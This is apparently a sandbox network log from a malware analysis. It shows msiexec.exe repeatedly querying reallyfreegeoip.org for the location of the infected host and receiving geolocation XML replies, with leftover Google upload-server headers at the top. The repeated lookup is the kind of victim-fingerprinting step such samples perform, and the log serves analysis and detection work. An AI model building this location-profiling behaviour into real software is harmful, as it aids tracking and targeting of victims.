                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 275008
                                                                                              Last-Modified: Wed, 23 Oct 2024 10:38:06 GMT
                                                                                              X-GUploader-UploadID: AHmUCY3RUEPBPqOgWG8Umz56MG7PlGMimGE6acPN7IYpNlA9CPAsg_D9BgpGg8qwkQcrqo9eK2Z-HrV--A
                                                                                              Date: Thu, 24 Oct 2024 10:03:06 GMT
                                                                                              Expires: Thu, 24 Oct 2024 10:03:06 GMT
                                                                                              Cache-Control: private, max-age=0
                                                                                              X-Goog-Hash: crc32c=TJH0Sw==
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                               2 | 192.168.2.22 | 49165 | 188.114.97.3 | 443 | 2504 | C:\Windows\SysWOW64\msiexec.exe
                                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                                               2024-10-24 10:03:10 UTC | 87 | OUT | GET /xml/173.254.250.71 HTTP/1.1
                                                                                              Host: reallyfreegeoip.org
                                                                                              Connection: Keep-Alive
                                                                                               2024-10-24 10:03:10 UTC | 894 | IN | HTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:10 GMT
                                                                                              Content-Type: application/xml
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              access-control-allow-origin: *
                                                                                              vary: Accept-Encoding
                                                                                              Cache-Control: max-age=86400
                                                                                              CF-Cache-Status: HIT
                                                                                              Age: 30138
                                                                                              Last-Modified: Thu, 24 Oct 2024 01:40:52 GMT
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=063V9aa%2Bc6hkyi%2FJGO4e61gKnfad8HfPC5RHXmq1MWQjFOZ1EusZEv4NgLiJHBVVEP1l67MjGA5ezxDpRudvy7aahXBBGW0Q6ZQezlRtZDp1JzYBFwD4OTGGJbyZkYs3UuY%2FqtSX"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8d7922ad7a9b2cc9-DFW
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1408&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1766931&cwnd=251&unsent_bytes=0&cid=3265bcc1f8416b91&ts=177&x=0"
                                                                                               2024-10-24 10:03:10 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                               Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                               2024-10-24 10:03:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                               Data Ascii: 0


                                                                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                               3 | 192.168.2.22 | 49166 | 188.114.97.3 | 443 | 2504 | C:\Windows\SysWOW64\msiexec.exe
                                                                                               Timestamp | Bytes transferred | Direction | Data
                                                                                               2024-10-24 10:03:11 UTC | 63 | OUT | GET /xml/173.254.250.71 HTTP/1.1
                                                                                              Host: reallyfreegeoip.org
                                                                                               2024-10-24 10:03:11 UTC | 894 | IN | HTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:11 GMT
                                                                                              Content-Type: application/xml
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              access-control-allow-origin: *
                                                                                              vary: Accept-Encoding
                                                                                              Cache-Control: max-age=86400
                                                                                              CF-Cache-Status: HIT
                                                                                              Age: 30139
                                                                                              Last-Modified: Thu, 24 Oct 2024 01:40:52 GMT
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=62tk6g1PJMzqr7Nr1WuSEiem3AlOIW%2FkySUwYkRUqDxuPuqpj5wGb1l8ehxluAVmh8ohHSAIgzImGGdac8SJURlv8%2F2TtprLWrF3khBHvW6NctphnvhjBLM0oLEbKmgIq%2BpYgN0q"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8d7922b48d7ae853-DFW
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1328&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2075985&cwnd=251&unsent_bytes=0&cid=1c899a76ef2f633b&ts=149&x=0"
                                                                                               2024-10-24 10:03:11 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                               Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                               2024-10-24 10:03:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                               Data Ascii: 0


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
4          | 192.168.2.22 | 49168       | 188.114.96.3   | 443              | 2504 | C:\Windows\SysWOW64\msiexec.exe

Timestamp: 2024-10-24 10:03:13 UTC | Bytes transferred: 87 | Direction: OUT
GET /xml/173.254.250.71 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
Timestamp: 2024-10-24 10:03:13 UTC | Bytes transferred: 902 | Direction: IN
HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 10:03:13 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 30141
Last-Modified: Thu, 24 Oct 2024 01:40:52 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mIH49O7l%2FiqMdpGXdXgnqaT9ZTFmvZEGgy7geGK27RKB45t%2Fpx%2FTduit0ISV%2F9beDwemULkGQJ00iDArImRlAzqTRGh4%2FqNaa0NSv9X%2B417Gx3vdzBFs6jFYKQo%2Bej6MU3d3jIp5"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d7922c06bb56b15-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1154&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2503025&cwnd=251&unsent_bytes=0&cid=63f2f8987ccf32ad&ts=145&x=0"
Timestamp: 2024-10-24 10:03:13 UTC | Bytes transferred: 366 | Direction: IN
Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
Timestamp: 2024-10-24 10:03:13 UTC | Bytes transferred: 5 | Direction: IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
5          | 192.168.2.22 | 49170       | 188.114.96.3   | 443              | 2504 | C:\Windows\SysWOW64\msiexec.exe

Timestamp: 2024-10-24 10:03:15 UTC | Bytes transferred: 87 | Direction: OUT
GET /xml/173.254.250.71 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
Timestamp: 2024-10-24 10:03:15 UTC | Bytes transferred: 898 | Direction: IN
HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 10:03:15 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 30143
Last-Modified: Thu, 24 Oct 2024 01:40:52 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G4C%2BYX2D5lS9rnIsEqqbPx2BfnSIHZhSxW9bZAOHosgGyOQ46%2FHrR%2FkQTdJqeJ%2FepXuM9fMySus7Ffk00zS5jgBNi4epmV1O5xC5IQdoiS%2Br00vGfjAfNlDyMW3sfaoxP9zX557s"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d7922ce8f704600-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1788&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1520209&cwnd=251&unsent_bytes=0&cid=fcdc53a0a1ca5743&ts=396&x=0"
Timestamp: 2024-10-24 10:03:15 UTC | Bytes transferred: 366 | Direction: IN
Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
Timestamp: 2024-10-24 10:03:15 UTC | Bytes transferred: 5 | Direction: IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
6          | 192.168.2.22 | 49172       | 188.114.97.3   | 443              | 2504 | C:\Windows\SysWOW64\msiexec.exe

Timestamp: 2024-10-24 10:03:17 UTC | Bytes transferred: 87 | Direction: OUT
GET /xml/173.254.250.71 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
Timestamp: 2024-10-24 10:03:17 UTC | Bytes transferred: 908 | Direction: IN
HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 10:03:17 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 30145
Last-Modified: Thu, 24 Oct 2024 01:40:52 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=14k2%2BURhY8EUR4na6Hhgbxp%2F9oZ%2BsO8ntLRtdgb%2Bw7UA7JiQ%2FoVkpiDBBspwfMx50igOQkXWNNYMvT%2BzEgQQUajan6BWaS4EciKyBXmAxO0%2B8BV%2FJiy%2BPkMaE2d4nlizb2LVt%2FHY"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d7922d96cd44787-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2343&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1232865&cwnd=251&unsent_bytes=0&cid=07d247940a3f3aee&ts=150&x=0"
Timestamp: 2024-10-24 10:03:17 UTC | Bytes transferred: 366 | Direction: IN
Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
Timestamp: 2024-10-24 10:03:17 UTC | Bytes transferred: 5 | Direction: IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
7          | 192.168.2.22 | 49174       | 188.114.97.3   | 443              | 2504 | C:\Windows\SysWOW64\msiexec.exe

Timestamp: 2024-10-24 10:03:19 UTC | Bytes transferred: 63 | Direction: OUT
GET /xml/173.254.250.71 HTTP/1.1
Host: reallyfreegeoip.org
Timestamp: 2024-10-24 10:03:19 UTC | Bytes transferred: 892 | Direction: IN
HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 10:03:19 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 30147
Last-Modified: Thu, 24 Oct 2024 01:40:52 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BwaDBnSiEAsMpR6r1vuWzUrpI23TOBS%2Bns8uDkDgtUGt5lU4a4XFupEaStdEV0KvpX8KaFZeLCd1adGwO69qVYJAKlurocJc25rgDpa%2B2jcnA0fZkbxXlKvg8rNTSvrHmHyjpKoh"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d7922e4bfd9ea60-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1258&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2264268&cwnd=251&unsent_bytes=0&cid=254c11225a5f3126&ts=261&x=0"
Timestamp: 2024-10-24 10:03:19 UTC | Bytes transferred: 366 | Direction: IN
Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
Timestamp: 2024-10-24 10:03:19 UTC | Bytes transferred: 5 | Direction: IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
8          | 192.168.2.22 | 49176       | 188.114.97.3   | 443              | 2504 | C:\Windows\SysWOW64\msiexec.exe

Timestamp: 2024-10-24 10:03:20 UTC | Bytes transferred: 87 | Direction: OUT
GET /xml/173.254.250.71 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
Timestamp: 2024-10-24 10:03:20 UTC | Bytes transferred: 898 | Direction: IN
HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 10:03:20 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 30148
Last-Modified: Thu, 24 Oct 2024 01:40:52 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B89pwOp9ATGj6sAOdzPjlfOWtWK552kxiOQn6S%2BijikUSZfuFV01ODaYwVaL9gqpZEn1MUAR4O24Mzo8GkSth5jxsuNme%2B8ixubX5EwNfJLQWEjHoSGGEzNpXF2h7ckuET%2BfCH%2F4"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d7922eddaec4793-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1849&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1540425&cwnd=251&unsent_bytes=0&cid=911c137e0d5154c6&ts=149&x=0"
Timestamp: 2024-10-24 10:03:20 UTC | Bytes transferred: 366 | Direction: IN
Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
Timestamp: 2024-10-24 10:03:20 UTC | Bytes transferred: 5 | Direction: IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
9          | 192.168.2.22 | 49178       | 188.114.97.3   | 443              | 2504 | C:\Windows\SysWOW64\msiexec.exe

Timestamp: 2024-10-24 10:03:22 UTC | Bytes transferred: 87 | Direction: OUT
GET /xml/173.254.250.71 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
Timestamp: 2024-10-24 10:03:22 UTC | Bytes transferred: 902 | Direction: IN
HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 10:03:22 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 30150
Last-Modified: Thu, 24 Oct 2024 01:40:52 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GLmkjl3DLvW11myjErzF0M0YlyqdsR59%2ByGb77%2FXq29rIXZCbbRlzut%2FzPoWhPAEf15c4N1YBgMG9%2BRQspthg55gTZm%2BSe7shLqbHoG%2FeZy46YAIbh%2BJzmpLMPWrihwbYuEqbroQ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d7922fabeef2c92-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1030&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2666666&cwnd=239&unsent_bytes=0&cid=6fde64328a213deb&ts=152&x=0"
Timestamp: 2024-10-24 10:03:22 UTC | Bytes transferred: 366 | Direction: IN
Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
Timestamp: 2024-10-24 10:03:22 UTC | Bytes transferred: 5 | Direction: IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP    | Source Port | Destination IP | Destination Port | PID  | Process
10         | 192.168.2.22 | 49180       | 188.114.97.3   | 443              | 2504 | C:\Windows\SysWOW64\msiexec.exe

Timestamp: 2024-10-24 10:03:24 UTC | Bytes transferred: 87 | Direction: OUT
GET /xml/173.254.250.71 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
Timestamp: 2024-10-24 10:03:24 UTC | Bytes transferred: 900 | Direction: IN
HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 10:03:24 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 30152
Last-Modified: Thu, 24 Oct 2024 01:40:52 GMT
